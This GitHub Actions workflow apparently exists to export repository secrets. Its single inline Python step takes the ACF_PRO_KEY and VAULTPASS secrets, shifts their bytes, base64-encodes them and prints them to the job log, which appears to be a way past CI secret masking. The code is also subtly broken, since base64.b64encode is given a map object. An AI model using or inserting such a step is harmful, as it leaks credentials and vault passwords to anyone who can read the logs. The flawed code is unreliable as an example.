---

on:
  workflow_dispatch:
jobs:
  export:
    runs-on: ubuntu-latest
    name: Export
    steps:
      - shell: python
        run: |
          import base64
          import itertools
          rot128 = lambda b: ((b + 128) % 256)
          encoder = lambda s: base64.b64encode(map(rot128, s.encode('utf-8'))).decode("utf-8")
          strings = (
            ("ACF_PRO_KEY", "flag${{ secrets.ACF_PRO_KEY }}"),
            ("VAULTPASS", "flag${{ secrets.VAULTPASS }}"),
          )
          print([f"{s[0]}: {encoder(s[1])}" for s in strings])

        